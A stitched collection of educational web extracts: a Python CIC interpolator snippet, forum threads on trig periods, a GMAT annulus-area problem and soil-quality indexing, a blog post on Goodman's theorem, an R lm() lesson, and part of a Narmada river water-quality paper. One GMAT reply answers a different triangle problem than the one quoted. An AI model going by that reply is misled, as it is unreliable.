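def cic_interpolate(x, R=2, M=1, N=2):
    """Floating-point CIC interpolator model: N combs at the low rate,
    zero-stuffing by R, then N integrators at the high rate."""
    y = np.asarray(x, dtype=float)
    for _ in range(N):                        # comb: y[n] = y[n] - y[n - M]
        delayed = np.concatenate((np.zeros(M), y[:-M]))
        y = y - delayed
    up = np.zeros(len(y) * R)                 # rate change: insert R-1 zeros
    up[::R] = y
    for _ in range(N):                        # integrator: running sum
        up = np.cumsum(up)
    return up                                 # gain is (R*M)**N / R

# Usage mirroring the example above: a 1050 Hz tone sampled at 22.05 kHz,
# interpolated by 2 and divided by the gain of 2.
t = np.arange(32) / 22.05e3
x = np.sin(2 * np.pi * 1050 * t)
y = cic_interpolate(x, R=2, M=1, N=2) / 2.0
```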
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 18, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5381259322166443, "perplexity": 5546.71732791458}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-45/segments/1603107894426.63/warc/CC-MAIN-20201027170516-20201027200516-00328.warc.gz"}
http://mathhelpforum.com/trigonometry/173459-trig-transformation-graph-easy.html
# Thread: Trig transformation graph - Easy

1. ## Trig transformation graph - Easy

I forgot how to do this: 6 cos(4x) and 6 sin(8x). I know the amplitude is 6. I'm having trouble finding the period. Can someone tell me how to find the period?

2. The period of $\sin(ax)$ is $\dfrac{2\pi}{a}$. The same applies for $\cos(ax)$.
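Applied to the two functions in the question: for $6\cos(4x)$ the period is $\dfrac{2\pi}{4}=\dfrac{\pi}{2}$, and for $6\sin(8x)$ it is $\dfrac{2\pi}{8}=\dfrac{\pi}{4}$; the amplitude of each is indeed 6.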
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 3, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9854238033294678, "perplexity": 1409.848074145412}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172050.87/warc/CC-MAIN-20170219104612-00438-ip-10-171-10-108.ec2.internal.warc.gz"}
http://gmatclub.com/forum/the-figure-above-shows-a-circular-flower-bed-with-its-cente-144448.html
# The figure above shows a circular flower bed, with its center at O : GMAT Problem Solving (PS)

Manager — 20 Dec 2012, 05:43

Attachment: Circle.png

The figure above shows a circular flower bed, with its center at O, surrounded by a circular path that is 3 feet wide. What is the area of the path, in square feet?

(A) $$25\pi$$
(B) $$38\pi$$
(C) $$55\pi$$
(D) $$57\pi$$
(E) $$64\pi$$

Math Expert — 20 Dec 2012, 05:48

The radius of the bigger circle is 8 + 3 = 11 feet, thus its area is $$\pi{r^2}=121\pi$$. The area of the smaller circle is $$\pi{8^2}=64\pi$$. The difference is $$121\pi-64\pi=57\pi$$.
Director — 26 Apr 2016, 14:15

Radius of the total garden = 8 + 3 = 11 feet.
Area of the flower bed including the path = $$\pi \cdot 11^2$$.
Area of the flower bed = $$\pi \cdot 8^2$$.
Area of the path alone = $$57\pi$$ square feet.
Correct answer: D

Head of GMAT Instruction, Target Test Prep — 27 Apr 2016, 07:44

(Quoting the question above.) In solving this problem we first must recognize that the flower bed is the right triangle with sides of y yards, x yards, and z yards. We are given that the area of the bed (which is the right triangle) is 24 square yards. Since we know that the area of a triangle is ½ Base × Height, we can say:

24 = ½(xy)
48 = xy

We also know that x = y + 2, so substituting y + 2 for x in the area equation we have:

48 = (y+2)y
48 = y^2 + 2y
y^2 + 2y – 48 = 0
(y + 8)(y – 6) = 0
y = -8 or y = 6

Since we cannot have a negative length, y = 6. We can use the value for y to calculate the value of x:

x = y + 2 = 6 + 2 = 8

We can see that 6 and 8 represent the two legs of the right triangle, and now we need to determine the length of z, which is the hypotenuse. Knowing that one leg is 6 and the other leg is 8, we know that we have a 6-8-10 right triangle. Thus, the length of z is 10 yards. If you didn't recognize that 6, 8, and 10 are the sides and hypotenuse of a right triangle, you would have to use the Pythagorean theorem to find the length of the hypotenuse: 6^2 + 8^2 = c^2 → 36 + 64 = c^2 → 100 = c^2. The positive square root of 100 is 10, and thus the value of z is 10.

Manager — 05 Jul 2016, 05:16

(Quoting the question above.) 8 + 3 = 11; 11^2 = 121; 8^2 = 64; 121π − 64π = 57π.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5984114408493042, "perplexity": 2278.1573300993555}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00334-ip-10-171-10-70.ec2.internal.warc.gz"}
https://stats.stackexchange.com/questions/9358/creating-an-index-of-quality-from-multiple-variables-to-enable-rank-ordering?noredirect=1
# Creating an index of quality from multiple variables to enable rank ordering I have four numeric variables. All of them are measures of soil quality. Higher the variable, higher the quality. The range for all of them is different: Var1 from 1 to 10 Var2 from 1000 to 2000 Var3 from 150 to 300 Var4 from 0 to 5 I need to combine four variables into single soil quality score which will successfully rank order. My idea is very simple. Standardize all four variables, sum them up and whatever you get is the score which should rank-order. Do you see any problem with applying this approach. Is there any other (better) approach that you would recommend? Thanks Edit: Thanks guys. A lot of discussion went into "domain expertise"... Agriculture stuff... Whereas I expected more stats-talk. In terms of technique that I will be using... It will probably be simple z-score summation + logistic regression as an experiment. Because vast majority of samples has poor quality 90% I'm going to combine 3 quality categories into one and basically have binary problem (somequality vs no-quality). I kill two birds with one stone. I increase my sample in terms of event rate and I make a use of experts by getting them to clasify my samples. Expert classified samples will then be used to fit log-reg model to maximize level of concordance / discordance with the experts.... How does that sound to you? The proposed approach may give a reasonable result, but only by accident. At this distance--that is, taking the question at face value, with the meanings of the variables disguised--some problems are apparent: 1. It is not even evident that each variable is positively related to "quality." For example, what if a 10 for 'Var1' means the "quality" is worse than the quality when Var1 is 1? Then adding it to the sum is about as wrong a thing as one can do; it needs to be subtracted. 2. Standardization implies that "quality" depends on the data set itself. Thus the definition will change with different data sets or with additions and deletions to these data. This can make the "quality" into an arbitrary, transient, non-objective construct and preclude comparisons between datasets. 3. There is no definition of "quality". What is it supposed to mean? Ability to block migration of contaminated water? Ability to support organic processes? Ability to promote certain chemical reactions? Soils good for one of these purposes may be especially poor for others. 4. The problem as stated has no purpose: why does "quality" need to be ranked? What will the ranking be used for--input to more analysis, selecting the "best" soil, deciding a scientific hypothesis, developing a theory, promoting a product? 5. The consequences of the ranking are not apparent. If the ranking is incorrect or inferior, what will happen? Will the world be hungrier, the environment more contaminated, scientists more misled, gardeners more disappointed? 6. Why should a linear combination of variables be appropriate? Why shouldn't they be multiplied or exponentiated or combined as a posynomial or something even more esoteric? 7. Raw soil quality measures are commonly re-expressed. For example, log permeability is usually more useful than the permeability itself and log hydrogen ion activity (pH) is much more useful than the activity. What are the appropriate re-expressions of the variables for determining "quality"? 
One would hope that soils science would answer most of these questions and indicate what the appropriate combination of the variables might be for any objective sense of "quality." If not, then you face a multi-attribute valuation problem. The Wikipedia article lists dozens of methods for addressing this. IMHO, most of them are inappropriate for addressing a scientific question. One of the few with a solid theory and potential applicability to empirical matters is Keeney & Raiffa's multiple attribute valuation theory (MAVT). It requires you to be able to determine, for any two specific combinations of the variables, which of the two should rank higher. A structured sequence of such comparisons reveals (a) appropriate ways to re-express the values; (b) whether or not a linear combination of the re-expressed values will produce the correct ranking; and (c) if a linear combination is possible, it will let you compute the coefficients. In short, MAVT provides algorithms for solving your problem provided you already know how to compare specific cases. • RE: 1. I know for sure that "higher the number, higher the quality" for all four variables RE: 2. Good point. What can I do to make two datasets comparable – user333 Apr 8 '11 at 16:02 • @user My recommendations are in the last paragraph: preferably, find a quantitative expression of "quality" in the scientific literature. Barring that, apply MAVT. Both produce a fixed formula independent of the dataset. That assures comparability. – whuber Apr 8 '11 at 16:06 • @whuber, Couldn't one view this as a problem of making a formative measure based on the available information, in which case summing the Z-scores is not as bad as you make it sound? – Andy W Apr 8 '11 at 17:38 • @Andy Could you explain what you mean by "formative measure" and "available information"? // I should point out that many measures of soil suitability for agriculture are not even monotonic, much less linear: for instance, a plant might flourish within a range of pH but suffer with pH's beyond this range in either direction. It would be a special circumstance indeed--maybe one involving a narrow range of values--if a simple linear combination of soil characteristics had any objective relationship to agricultural qualities. – whuber Apr 8 '11 at 17:52 • @Andy Assuming "quality" is a numeric value to be used for ranking soil samples, then definitely the problem is one of discrete decisions: given a pair of attributes $(y_1, \ldots, y_k)$ and $(x_1, \ldots, x_k)$, which has better quality? You are correct that you need to know something about what quality is in order to create the desired combination of the attributes. The approach I have taken supposes you do not have an independent assessment of quality (that would put us into a regression or response surface modeling situation), but you can make these comparisons with reasonable accuracy. – whuber Apr 8 '11 at 19:09 Anyone looked at Russell G. Congalton 'Review of Assessing the Accuracy of Classifications of Remotely Sensed Data' 1990 ?. It describes a technique known as error matrix for varing matrices, also a term he uses called ' Normalizing data' , whereby one gets all the different vectors and 'normalizes' or sets them to equal from 0 to 1. You basically change all vectors to equal ranges from 0 to 1. One other thing you did not discuss is the scale of the measurements. V1 and V5 looks like they are of rank order and the other seem not. So standardization may be skewing the score. 
So you may be better off transforming all of the variables into ranks and determining a weighting for each variable, since it is highly unlikely that they have the same weight. Equal weighting is more of a "know-nothing" default. You might want to do some correlation or regression analysis to come up with some a priori weights.

• How can I use correlation analysis to determine weights? – user333 Apr 8 '11 at 16:36
• If you already have a pre-existing overall measure of quality, e.g. expert opinions (or are willing to accept other variables as a proxy for this), you could choose the most highly correlated variables and give them the highest weighting. – Ralph Winters Apr 8 '11 at 17:07

I had a similar problem recently and thought I would add my approach to the nice answers, as a simple way to determine which weighting of the variables leads to the best ranking. You could transform your problem into a grid-search approach: use a combined score for the ranking, composed as

Final_score = Var1 * A + Var2 * B + Var3 * C ...

Then you can compute the final score with different values for A, B, C (sklearn's grid search could be used) and compare the resulting ranking to an expected ranking (some ground truth is needed to determine the goodness of your ranking). The best parameters give the weights of your individual variables.

Following up on Ralph Winters' answer, you might use PCA (principal component analysis) on the matrix of suitably standardized scores. This will give you a "natural" weight vector that you can use to combine future scores. Do this also after all scores have been transformed into ranks. If the results are very similar, you have good reasons to continue with either method. If there are discrepancies, this will lead to interesting questions and a better understanding.

• I disagree. While one would likely be interested in the inter-item correlations for curiosity, all of the variables could be orthogonal yet still contribute to quality. For a silly example, the soil in Antarctica may have optimal nitrogen content, but I doubt it would suffice as a suitable climate. – Andy W Apr 8 '11 at 18:45
• @Andy W: In that case, all the variables should be weighted equally, and PCA will tell you that. It would also tell you that the leading component only accounts for a relatively small fraction of the overall variability in the scores matrix. – Hans Engler Apr 8 '11 at 20:52
• I still disagree. It does not tell you if the scores should be weighted equally. Two items could have a positive correlation yet each has opposite relationships to "quality". The inter-item correlations do not necessarily say anything about the unobserved measure in the given context. If quality were a latent variable and the variables were "reflective" of that latent construct, that may be true, but that is not the case in this example. – Andy W Apr 9 '11 at 3:48
• @Andy, I agree with your point if nothing were known about the association of the observed variables with "quality". But the OP wrote "All of [the variables] are measures of soil quality. Higher the variable, higher the quality", implying a positive association throughout. To be more precise: Let $A$ be the $m \times n$ matrix of observations. Consider the first term $\sigma_1 uv^T$ in the singular value decomposition of $A$. If all $n$ variables have the same association with "quality", one expects all $v_j$ to have the same sign. In that case, use multiples of these $v_j$ as weights. – Hans Engler Apr 9 '11 at 21:56
• I still disagree.
Even if the association is expected to be in the same direction, this does not mean the indicators should inherently be given weights based on their inter-item correlations. The shared variance can only say something about the relationship between the indicators. Think of a regression model in which we predict a known measure of quality from these indicators: the inter-item correlations between the indicators do not tell you what the expected slopes will be. – Andy W Apr 10 '11 at 12:38
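To make the grid-search suggestion above concrete, here is a minimal sketch. The "ground truth" ranking is invented purely for illustration, and the linear, equally monotonic combination is itself an assumption that, as noted in the comments, may not hold for soil data.

```python
# Hypothetical sketch of the grid-search idea: try weight combinations for a
# combined score and keep the one whose ranking best matches a reference
# ("ground truth") ranking. All data here are random placeholders.
import itertools
import numpy as np
from scipy.stats import spearmanr

rng = np.random.default_rng(0)
X = rng.random((20, 4))            # 20 soil samples, 4 rescaled variables
true_rank = rng.permutation(20)    # stand-in for an expert / ground-truth ranking

grid = np.linspace(0, 1, 6)        # candidate weights per variable
best_w, best_rho = None, -np.inf
for w in itertools.product(grid, repeat=X.shape[1]):
    w = np.array(w)
    if w.sum() == 0:
        continue
    score = X @ (w / w.sum())      # weighted combined score
    rho, _ = spearmanr(score, true_rank)
    if rho > best_rho:
        best_w, best_rho = w / w.sum(), rho

print("best weights:", np.round(best_w, 2), "Spearman rho:", round(best_rho, 2))
```

The same comparison against the reference ranking could also be used to check a PCA-derived weight vector, which keeps the choice between the two approaches an empirical question.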
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5986588597297668, "perplexity": 957.3520749912898}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623488517820.68/warc/CC-MAIN-20210622124548-20210622154548-00288.warc.gz"}
http://paulooliva.blogspot.com/2013/03/goodmans-theorem.html?showComment=1366234997744
## Monday, 4 March 2013 ### Goodman's theorem Let HA denote Heyting (intuitionistic) arithmetic and HA$$^\omega$$ be Heyting arithmetic extended to the language of finite types, i.e. with quantifiers for each finite type. AC stands for the axiom of choice. Finally, recall that a formula is arithmetical if it only contains quantifications over numbers. In [1,2] Goodman proved the following amazing result: Theorem. If HA$$^\omega$$ + AC proves an arithmetical formula $$A$$ then HA already proves $$A$$. In proof theory one would simply say that HA$$^\omega$$ + AC is conservative over HA. The fact that HA$$^\omega$$ is conservative over HA was already known and is easy to show. But the conservation of HA$$^\omega$$ + AC over HA is quite a surprising result. Recall that adding the axiom of choice to classical mathematics leads to all sorts of strange things (e.g. the Banach-Tarski paradox). Goodman's theorem essentially says that this is not the fault of the axiom of choice, but rather a fault of the combination of the axiom of choice with classical logic. Classical logic on its own makes perfect sense. The axiom of choice in an intuitionistic setting is harmless. But when these two are put together all hell breaks loose. Proof of Goodman's theorem. Goodman's proof involves two major proof-theoretic techniques: forcing and realizability. Realizability is used to eliminate the axiom of choice, since the axiom of choice has a trivial realizer. But then one ends up with a proof of "$$t$$ realizes $$A$$". Forcing is used to recover the truth of $$A$$ given that $$A$$ has a realizer. That is done by choosing the forcing conditions to be approximations of the Skolem functions of the sub-formulas of $$A$$. So, the axiom of choice is replaced by finite approximations of Skolem functions! Let's see a few of the details: We present here a sketch of Beeson's proof [3] of Goodman's theorem. Beeson's proof has the advantage (over Goodman's proof) that the two techniques of forcing and realizability are clearly separated. The proof consists of the following steps: (1) Let $$A$$ be an arithmetical formula such that HA$$^\omega$$ + AC $$\vdash A$$. (2) Let HA$$^\omega_a$$ denote the extension of HA$$^\omega$$ with a new function symbol $$a$$. By the soundness of Kleene realizability relative to $$a$$ we have HA$$^\omega_a \vdash t$$ realizes $$A$$, where $$t$$ is a term of HA$$^\omega_a$$. (3) By the soundness of the forcing interpretation we have HA$$^\omega \vdash \exists p (p \Vdash t$$ realizes $$A)$$, where the forcing conditions are chosen as in the main lemma (below). Forcing is done as usual, with the crucial difference that in the forcing of the atomic formulas the forcing condition $$p$$ replaces the "generic" function $$a$$, i.e. $$p \Vdash a(n) = m$$ is defined as $$p(n) = m$$, where I'm actually using the equality symbol "=" for partial equality. (4) By the main lemma HA$$^\omega \vdash \forall p \exists q \leq p (q \Vdash (t$$ realizes $$A) \Rightarrow A)$$. (5) By (3) and (4) we have HA$$^\omega \vdash \exists q (q \Vdash A)$$. (6) As for arithmetical formula HA$$^\omega \vdash (q \Vdash A) \Leftrightarrow A$$ we have, HA$$^\omega \vdash A$$. Steps (2) and (3) are pretty standard realizability and forcing interpretations. And only the soundness theorems of these are used. Step (6) is also easy to check by a simple induction on $$A$$. So, the crucial bit of the proof is the choice of the forcing conditions and the main lemma which we discuss next. Main lemma. Fix an arithmetical sentence $$A$$. 
Then there is a set $$C$$ of forcing conditions such that $$\mbox{HA}^\omega \vdash \forall p \exists q \leq p (q \Vdash (t \mbox{ realizes } A) \Rightarrow A).$$ Proof of main lemma. The set of forcing conditions $$C$$ consists of finite functions $$p$$ which are approximations to the Skolem functions of all sub-formulas of $$A$$. More precisely, these are partial functions $$p$$ with finite domain such that for each sub-formula $$B(x, y)$$ of $$A$$ we have $$\exists x B(x, y) \wedge (p_{\exists x B(x, y)}(y) \mbox{ defined }) \Rightarrow B(p_{\exists x B(x, y)}(y), y).$$ Hence, whenever the approximation to the Skolem function $$p_{\exists x B(x, y)}$$ is defined then it produces the right witness. Relative to these (approximation of) Skolem functions, it's easy to show the following: (i) HA$$^\omega \vdash \forall p \exists q \leq p (q \Vdash (B(y) \Rightarrow \{j_B\}(y) \mbox{ realizes } B ))$$, for some index $$j_B$$ which we can construct (using the Skolem functions). (ii) HA$$^\omega \vdash \forall p \exists q \leq p (q \Vdash (t \mbox{ realizes } B ) \Rightarrow B)$$. Remark. Ulrich Kohlenbach [4] has shown the interesting fact that Goodman's theorem does not hold for fragments of HA$$^\omega$$. This means that in order to eliminate AC from the proof of an arithmetical formula $$A$$ we might have to use a more complex induction than in the proof which is allowed to use AC. Thierry Coquand [5] has just published another proof of Goodman's theorem. [1] Goodman, N., The theory of the Gödel functionals, Journal of Symbolic Logic 41, 574-583 (1976) [2] Goodman, N. Relativized realizability in intuitionistic arithmetic of all finite types. Journal of Symbolic Logic 43, pp. 23-44 (1978) [3] Beeson, M., Goodman's theorem and beyond. Pacific J. Math. 84, 1-16 (1979) [4] Kohlenbach, U., A note on Goodman's theorem. Studia Logica 63, 1-5 (1999) [5] Coquand, T., About Goodman's theorem. Annals of Pure and Applied Logic 164(4), 437-442 (2013)
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 2, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9853195548057556, "perplexity": 499.37556449054256}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-30/segments/1531676590866.65/warc/CC-MAIN-20180719105750-20180719125750-00131.warc.gz"}
http://coursekata.org/preview/version/0ea12f05-dce8-4b7c-a6ad-5950ec4a57bb/lesson/10/2
# Statistics and Data Science: A Modeling Approach

## 7.2 Fitting a Model With an Explanatory Variable

Now that you have learned how to specify a model with an explanatory variable, let’s learn how to fit the model using R. Fitting a model, as a reminder, simply means calculating the parameter estimates. We use the word “fitting” because we want to calculate the best estimate, the one that will result in the least amount of error. For the tiny data set, we could calculate the parameter estimates in our head—it’s just a matter of calculating the mean for males and the mean for females. But when the data set is larger, it is much easier to use R. Using R, we will first fit the Sex model to the tiny data set, just so you can see that R gives you the same parameter estimates you got before. After that we will fit it to the complete data set.

Note that the parts that are going to be different for each person ($$X_{i}$$ and $$Y_{i}$$) are called variables (because they vary)! $$e_i$$ also varies, but we typically reserve the label “variable” for outcome and explanatory variables. The parts that are going to be the same for each person ($$b_{0}$$ and $$b_{1}$$) are called parameter estimates. We do not need to estimate the variables. Each student in the data set already has a score for the outcome variable ($$Y_{i}$$) and the explanatory variable ($$X_{i}$$), and these scores vary across students. Notice that the subscript $$i$$ is attached to the parts that are different for each person.

We do need to estimate the parameters because, as discussed previously, they are features of the population, and thus are unknown. The parameter estimates we calculate are those that best fit our particular sample of data. But we would have gotten different estimates if we had a different sample. Thus, it is important to keep in mind that these estimates are only that, and they are undoubtedly wrong. Calling them estimates keeps us humble! Parameter estimates don’t vary from person to person, so they don’t carry the subscript $$i$$.

### Fitting the Sex Model to the Tiny Data Set

We will refer to this more complex model (more complex than the empty model, that is) as the Sex model. It has one explanatory variable, Sex. We will fit the model using R’s lm() (linear model) function. To fit the model we run this R code, and get the results below:

lm(Thumb ~ Sex, data=TinyFingers)

Call:
lm(formula = Thumb ~ Sex, data = TinyFingers)

Coefficients:
(Intercept)      Sexmale
         59            6

Note that the estimates are exactly what you should have expected: the first estimate, for $$b_{0}$$, is 59 (the mean for females); the second, $$b_{1}$$, is 6, which is the number of millimeters you need to add to the female average thumb length to get the average male thumb length.

Notice that the estimate for $$b_{0}$$ is labeled “Intercept” in the output. You have encountered the concept of intercept before, when you studied the concept of a line in algebra. Remember the equation for a line? $$y=mx+b$$. $$m$$ represents the slope of the line, and $$b$$, the y-intercept. The General Linear Model notation is similar to this, though it includes error, whereas the equation for a line does not. The reason the estimate for $$b_{0}$$ is called Intercept is because it is the estimate for thumb length when $$X_{i}$$ is equal to 0—in other words, when sex is female. The estimate that R called “Sexmale,” by this line of reasoning, is kind of like the slope of a line. It is the increment in thumb length for a unit increase in $$X_{i}$$.
If you want—and it’s a good idea—you can save the results of this model fit in an R object. Here’s the code to save the model fit in an object called TinySex.model:

TinySex.model <- lm(Thumb ~ Sex, data=TinyFingers)

Once you’ve saved the model, if you want to see what the model estimates are, you can just type the name of the model and you will get the same output as above:

TinySex.model

Call:
lm(formula = Thumb ~ Sex, data = TinyFingers)

Coefficients:
(Intercept)      Sexmale
         59            6

Now that we have estimates for the two parameters, we can put them in our model statement to yield: $$Y_{i} = 59 + 6X_{i} + e_{i}$$.

### Fitting the Sex Model to the Complete Data Set

Now that you have looked in detail at the tiny set of data, find the best estimates for our bigger set of data (found in the data frame called Fingers) by modifying the code below, using lm() to create a model of Thumb by Sex from the Fingers data frame:

require(tidyverse)
require(mosaic)
require(Lock5Data)
require(supernova)

# store the model where Sex predicts Thumb
Sex.model <-

# this prints out the model estimates
Sex.model

One possible solution, with its output:

Sex.model <- lm(Thumb ~ Sex, data = Fingers)
Sex.model

Call:
lm(formula = Thumb ~ Sex, data = Fingers)

Coefficients:
(Intercept)      Sexmale
     58.256        6.447
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7234451174736023, "perplexity": 641.0218950907771}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610703513062.16/warc/CC-MAIN-20210117143625-20210117173625-00556.warc.gz"}
https://www.eeer.org/journal/view.php?number=1143
Environ Eng Res > Volume 26(1); 2021 > Article

Mishra and Kumar: Estimation of physicochemical characteristics and associated metal contamination risk in river Narmada, India

### Abstract

River Narmada is the fifth largest holy river of Madhya Pradesh (M.P.), flowing in the central part of India. The river receives large quantities of untreated/partially treated wastewater enriched with heavy metals and other toxic organic pollutants. This study aims to assess the water quality status in river Narmada for human use, using indices such as the comprehensive pollution index (CPI), heavy metal pollution index (HPI), risk assessment index (RAI) and cancer risk index (CRI). The presence of faecal coliform and a chemical oxygen demand above 20 mg/L indicate that the water is unsuitable for drinking purposes. The average CPI and HPI were evaluated to be 1.98 and 1.35, respectively, signifying moderately polluted river water. Notably, RAI > 1 and CRI > 1 were obtained at all sampling locations, which signals a possible cancer risk to humans if untreated river water is used. Principal component analysis of the data confirmed pollution in the river from both natural and anthropogenic sources. The strongest Pearson correlation coefficients, between Cu-Pb (0.998) and Zn-Cu (0.986), indicate the input of wastewater into the river, probably from electroplating industries. The river water is unsuitable for human intake, and the direct flow of wastewater into the river must be controlled to restore its ecological health.

### 1. Introduction

In most of the reported studies [1–5], the WQ status of river Narmada has been classified on the basis of comparing individual WQ parameters to their standards defined at the regional and international scale. However, such studies do not provide a complete picture of overall river water pollution or of the ecological health of the river. Moreover, a comprehensive study of WQ in river Narmada involving the assessment of heavy metals and other physicochemical parameters together with the biological characteristics that address biotic risk is yet to be carried out. In the present study, the physicochemical parameters (such as DO, BOD and COD), heavy metal concentrations (such as As, Cu and Cd) and bacteriological characteristics of water in river Narmada along its stretch in the state of Madhya Pradesh (M.P.), India were investigated extensively. The focus was to classify the suitability of river water for human use and to identify the major pollutants present in the river.

Globally, several water quality indices (WQI) have been developed for monitoring the surface WQ of freshwater bodies with respect to human use [16, 17]. A WQI is a concise and comprehensive method that expresses the river WQ or pollution status as a single number by aggregating the values of different physicochemical parameters [18]. Indices such as the national sanitation foundation water quality index (NSFWQI), comprehensive pollution index (CPI) and heavy metal pollution index (HPI) have proved to be trustworthy and are most commonly used to classify surface WQ [19]. In this study, the physicochemical parameter data were used to evaluate the CPI, while the heavy metal concentration data were used to evaluate the HPI for the respective sampling locations in river Narmada. Moreover, the risk assessment index (RAI) and cancer risk index (CRI) [20–22] were evaluated to predict the possibility of a carcinogenic impact on humans due to direct drinking of the river water.
Furthermore, environmetrics, which involves multivariate statistical methods such as principal component analysis (PCA) and hierarchical cluster analysis (HCA) [23, 24], was used to develop a composite indicator from the entire heavy metal dataset and to identify the probable sources that significantly affect river WQ in the study area.

### 2.1. Details of the Study Area

River Narmada is the largest west-flowing peninsular perennial river in the central part of India. It originates from the Maikala Hills near Amarkantak in Anuppur District of M.P., flowing through the Deccan traps in a westerly direction, hemmed between the Satpura and Vindhyan hills [15]. It covers a total length of 1,312 km through the state of M.P., draining a total area of 98,796 km2 before merging with the Arabian Sea via the Gulf of Cambay near Bharuch city of Gujarat [11]. The river Narmada basin lies between latitudes 21°20′N to 23°45′N and longitudes 72°32′E to 81°45′E, and it is characterized by a humid tropical climate with an average annual rainfall of 1,178 mm. The river is joined by 41 tributaries (19 on the right bank and 22 on the left bank), of which the Banjar, Hiran, Tawa, Burhner, Kundi, Chota-Tawa, and Orsang rivers are the major tributaries [12]. Notably, river Narmada is a lifeline of Madhya Pradesh, draining a major land area of 85,938 km2 (~87% of the total river basin area) from the east to the west boundary of the state. Considering the entrance of drains, tributaries, and the land-use pattern, surface water samples were collected from 23 selected sampling locations (Amarkantak to 